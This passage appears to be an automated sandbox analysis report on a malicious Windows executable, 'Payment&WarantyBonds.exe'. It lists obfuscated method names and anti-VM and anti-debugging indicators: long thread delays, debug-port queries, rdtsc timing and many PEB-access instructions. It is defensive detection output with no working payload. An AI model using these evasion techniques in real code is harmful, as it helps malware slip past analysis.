                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, HAAlopX3s3btnJ7UlG.csHigh entropy of concatenated method names: 'e1LkSK3AoZ', 'Hh4kQfWVgv', 'RLXkXqqDAR', 'H8MXBMdgpt', 'yfeXzUckVB', 'h2GkN0E8ri', 'lSbkIw48Wf', 'Cnik3x1Z97', 'aSMkyeJ67i', 'MRqkl12SKp'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, AADQktakk8MTMyie6y.csHigh entropy of concatenated method names: 'Bmdkif8IIB', 'L6AkaQiVkK', 'dHwkH0GiFn', 'zdYkDAFpvo', 'dbmkTJFniH', 'LTdkuNHPdi', 'HV0kjd0ZXo', 'JZpkWlNHBD', 'y6Tk2oYN99', 'PbOkcP99D3'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, O9OVTvmJ5CwcbAA2QZ.csHigh entropy of concatenated method names: 'bG85RPXZ8h', 'D1w5BTGDlb', 'vS18NYGJoj', 'WPL8IgRFd6', 'wTv5MvJrFH', 'YEF54p8Ra6', 'hh256Kuwyn', 'pUo5pFXg6H', 'EH05GDIvFS', 'rd35VFob2G'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, ABxuR4jclTb0QJbmgq0.csHigh entropy of concatenated method names: 'CAgYi4V1y5', 'I6wYaY9hQI', 'se5YHdoFsn', 'hVRYDFlshx', 'jQjYTPCAPw', 'bZKYuQBh01', 'LV8YjC82j3', 'prVYWDGqoP', 'n9AY2ogqLB', 'EoCYc32oYc'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, NrmpeS2PNSGs7X0CKD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MML3UFDoQs', 'oUg3BDrqxO', 'YdD3z8O835', 'UOhyNCpGOT', 'UbxyItfSQD', 'Qwly3XhCgV', 'a18yyLCnyV', 'h6uNpK9RXoM5RfXeO5A'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, lEe6OTuveACY3rt9Ok.csHigh entropy of concatenated method names: 'qrh8S7yRlu', 'AiJ8OqTS4D', 'lb08QL85Vx', 'pPa8nnEGVH', 'RDm8XRm892', 'fYM8kR20tL', 'Vdp8ma3QbK', 'AJ28E0hGrk', 'tAW8LXAjig', 'nuo8f4kWr1'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, RujqcAN6TG7qku38oo.csHigh entropy of concatenated method names: 'W6GXCbkhYm', 'kyEXiOkO2m', 's86XH1MPny', 'KbvXDVX5Iw', 'vBSXum4ZBf', 'jyBXjGiLIw', 'KATX2ma6f0', 'Px0Xcy6LcF', 'YRhTPekJlhCxTkSTO4t', 'vVwG1ekUNYHQOqdtFgh'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, Qcbo1atUNRX5uYhT4D.csHigh entropy of concatenated method names: 'ToString', 'rDRFM5qZ6M', 'oVQFxe49US', 'bqnFendFYA', 'OFZFoXUlaY', 'G35F08iHIv', 'tt2FdDluNJ', 'OrDFJtX3HI', 'VPpF99gk7h', 'R55F7JOdl4'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, MnUca67wwyq9isAD8V.csHigh entropy of concatenated method names: 'dpLnTegVLt', 'IgJnj86fhB', 'hCGQeCaxKL', 'n7nQoj0QqV', 'qQdQ00scvT', 'x5QQdbU60m', 'qUlQJNVAcU', 'qhuQ9srbnR', 'gYLQ7ABKWg', 'wpbQsqU9Ne'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, JFv6NDqobKO3oP7PJ5.csHigh entropy of concatenated method names: 'j0aXb4KEqm', 'EgAXOSi0p1', 'yNPXnR8iXq', 'bWjXk6N8N8', 'qHGXm7WVf6', 'sqwnKmvrfr', 'Vg7nhGPqqA', 'PVDnql004i', 'aWSnRaDRZj', 'gk8nUGtmqr'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, uLGJVHvUgM9ulOmn62.csHigh entropy of concatenated method names: 'a0DHPDf5h', 'gqNDCpfPk', 'orvuvVjmp', 'hDajMGx7H', 'YOw2qXi4r', 'e68cmLJkm', 'BVy6WQO0K8o6lAXNBt', 'gIy4ZgNlOJdfCjPBbp', 'G5r8UUbm0', 'dufgrMc9q'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, uPpMvls1PHjFnvTcDG.csHigh entropy of concatenated method names: 'Tkr8v62gZO', 'KKy8xIbLh1', 'SoH8euyMJH', 'aDF8opnAL0', 'VTh8pc90ZI', 'K3M80JlFeE', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, pN57RL3xyXkW5ANnHQ.csHigh entropy of concatenated method names: 'U8AybimXgu', 'T18yS8nemQ', 'Q5YyOVMPp2', 'ndjyQ2tjAW', 'uLvyn3pmLf', 'vx8yXoZe2b', 'NiaykWcRm5', 'dw7ympHo41', 'APUyEmTssh', 'DPFyLNiOf0'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, hsiK9PiqZrfnl6rMvi.csHigh entropy of concatenated method names: 'qWHQDnd3hK', 'g8uQuCWTZq', 'Db4QWEv1S7', 'X0OQ2ux8Qb', 'd5eQr8udm2', 'VbMQFUvxGO', 'BAjQ5wOKcH', 'OaWQ8CKrIg', 'm4KQY95xUx', 'N6kQgsLifj'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, c3QNNUoubAttVxH9S2.csHigh entropy of concatenated method names: 'ygp5LXincf', 'arO5fUTQrR', 'ToString', 'xMI5SQtPiM', 'xkd5ODAQ8v', 'JNd5QFlM44', 'FXh5naDk8m', 'jUs5XeXvhw', 'sTt5k1sJtu', 'K6T5mcUE48'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, LjvKfjQI7ZTyW35Lpd.csHigh entropy of concatenated method names: 'gADAWbr7XE', 'fbeA2km7Vk', 'w3jAvKbNKf', 'cAlAxbdhLn', 'tIYAoYR5SG', 'x9PA0HRtXZ', 'iIXAJNClKR', 'kgYA9KUrf4', 'mioAs4iaWq', 'jTLAMX6d8V'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, CGdMn0bkxNbGSKYFA0.csHigh entropy of concatenated method names: 'Dispose', 'PsJIUKMDsf', 'uX53xjA5Ed', 'r0Uttl1o0A', 'UPYIBy8eCX', 'zQ6IzH00tk', 'ProcessDialogKey', 'UQT3NQvIxK', 'z4M3IFZNsI', 'H1O33hWBNe'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, ioi8Rkz6CpkkqYwguL.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'uRVYApIJbY', 'NIyYrEHUlj', 'EHuYFuNKBF', 'GaYY56xelw', 'gsbY8dqZLb', 'X3xYY9XALK', 'qBXYgelKcZ'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, jfce7djWOMMimZwhZQb.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'zvogpc13wh', 'SmhgGyeWRf', 'xQHgVpIj1H', 'Qucg17uLjn', 'o6vgKE1bns', 'N3RghoqBN7', 'LoigqfyjmO'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, cILh9bHvx4dPN3VnUI.csHigh entropy of concatenated method names: 'Nl3OpoF2TO', 't9dOGPKSpm', 'elcOVU9JsF', 'C4hO1kUwGo', 'knhOK1M0lx', 'c4kOhSyJfK', 'jrMOqZFNb6', 'NXjOR0XNbK', 'rM4OUrjy7y', 'tGSOBYrBio'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, qtiCGhV5g3bg8x5VxE.csHigh entropy of concatenated method names: 'f14Ik3ayGQ', 'lxAImDcpuG', 'lqRILNo2n3', 'zlOIfO9NSy', 'yW5Ir7XStc', 'DdwIFvY5AB', 'FMGRR7EYd0dL4b47ss', 'pABd7rLec7iDJoHWIv', 'p6TII6gSOZ', 'EoEIysVF79'
                Source: 0.2.Payment&WarantyBonds.exe.40fd798.2.raw.unpack, HYqHWc4dupAKCWiUdf.csHigh entropy of concatenated method names: 'ihMYIPWspP', 'XdUYykfAWJ', 'elYYlxVOjF', 'mmUYS4MmeQ', 'QXSYOXVIOR', 'PWGYn6IIEv', 'J6xYXV4EiH', 'xIL8qaTmtN', 'KZm8Re7Mm6', 'K828UFM2CB'
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: Payment&WarantyBonds.exe PID: 7284, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE22210154
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 7A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 8440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 9440000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: A630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: B080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeMemory allocated: C080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184096E rdtsc 2_2_0184096E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeWindow / User API: threadDelayed 9660Jump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\systeminfo.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920Thread sleep count: 313 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920Thread sleep time: -626000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920Thread sleep count: 9660 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exe TID: 7920Thread sleep time: -19320000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940Thread sleep time: -57000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe TID: 7940Thread sleep time: -38000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systeminfo.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005CC500 FindFirstFileW,FindNextFileW,FindClose,7_2_005CC500
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: lVlYtqLlYCJP.exe, 00000008.00000002.4106292158.0000000000860000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                Source: systeminfo.exe, 00000007.00000002.4105934203.00000000009F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000009.00000002.2334739815.00000125FE76C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll??
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\systeminfo.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0184096E rdtsc 2_2_0184096E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_00417643 LdrLoadDll,2_2_00417643
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01840185 mov eax, dword ptr fs:[00000030h]2_2_01840185
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BC188 mov eax, dword ptr fs:[00000030h]2_2_018BC188
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018BC188 mov eax, dword ptr fs:[00000030h]2_2_018BC188
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A4180 mov eax, dword ptr fs:[00000030h]2_2_018A4180
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A4180 mov eax, dword ptr fs:[00000030h]2_2_018A4180
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188019F mov eax, dword ptr fs:[00000030h]2_2_0188019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188019F mov eax, dword ptr fs:[00000030h]2_2_0188019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188019F mov eax, dword ptr fs:[00000030h]2_2_0188019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0188019F mov eax, dword ptr fs:[00000030h]2_2_0188019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FC156 mov eax, dword ptr fs:[00000030h]2_2_017FC156
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C61C3 mov eax, dword ptr fs:[00000030h]2_2_018C61C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C61C3 mov eax, dword ptr fs:[00000030h]2_2_018C61C3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E1D0 mov eax, dword ptr fs:[00000030h]2_2_0187E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E1D0 mov eax, dword ptr fs:[00000030h]2_2_0187E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0187E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E1D0 mov eax, dword ptr fs:[00000030h]2_2_0187E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0187E1D0 mov eax, dword ptr fs:[00000030h]2_2_0187E1D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D61E5 mov eax, dword ptr fs:[00000030h]2_2_018D61E5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018301F8 mov eax, dword ptr fs:[00000030h]2_2_018301F8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov eax, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov ecx, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov eax, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov eax, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov ecx, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov eax, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov eax, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov ecx, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov eax, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AE10E mov ecx, dword ptr fs:[00000030h]2_2_018AE10E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AA118 mov ecx, dword ptr fs:[00000030h]2_2_018AA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AA118 mov eax, dword ptr fs:[00000030h]2_2_018AA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AA118 mov eax, dword ptr fs:[00000030h]2_2_018AA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018AA118 mov eax, dword ptr fs:[00000030h]2_2_018AA118
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C0115 mov eax, dword ptr fs:[00000030h]2_2_018C0115
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01830124 mov eax, dword ptr fs:[00000030h]2_2_01830124
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01894144 mov eax, dword ptr fs:[00000030h]2_2_01894144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01894144 mov eax, dword ptr fs:[00000030h]2_2_01894144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01894144 mov ecx, dword ptr fs:[00000030h]2_2_01894144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01894144 mov eax, dword ptr fs:[00000030h]2_2_01894144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01894144 mov eax, dword ptr fs:[00000030h]2_2_01894144
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01898158 mov eax, dword ptr fs:[00000030h]2_2_01898158
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806154 mov eax, dword ptr fs:[00000030h]2_2_01806154
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01806154 mov eax, dword ptr fs:[00000030h]2_2_01806154
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FA197 mov eax, dword ptr fs:[00000030h]2_2_017FA197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FA197 mov eax, dword ptr fs:[00000030h]2_2_017FA197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FA197 mov eax, dword ptr fs:[00000030h]2_2_017FA197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4164 mov eax, dword ptr fs:[00000030h]2_2_018D4164
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018D4164 mov eax, dword ptr fs:[00000030h]2_2_018D4164
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0180208A mov eax, dword ptr fs:[00000030h]2_2_0180208A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018980A8 mov eax, dword ptr fs:[00000030h]2_2_018980A8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C60B8 mov eax, dword ptr fs:[00000030h]2_2_018C60B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018C60B8 mov ecx, dword ptr fs:[00000030h]2_2_018C60B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018820DE mov eax, dword ptr fs:[00000030h]2_2_018820DE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FA020 mov eax, dword ptr fs:[00000030h]2_2_017FA020
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_017FC020 mov eax, dword ptr fs:[00000030h]2_2_017FC020
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018860E0 mov eax, dword ptr fs:[00000030h]2_2_018860E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018080E9 mov eax, dword ptr fs:[00000030h]2_2_018080E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018420F0 mov ecx, dword ptr fs:[00000030h]2_2_018420F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01884000 mov ecx, dword ptr fs:[00000030h]2_2_01884000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_018A2000 mov eax, dword ptr fs:[00000030h]2_2_018A2000
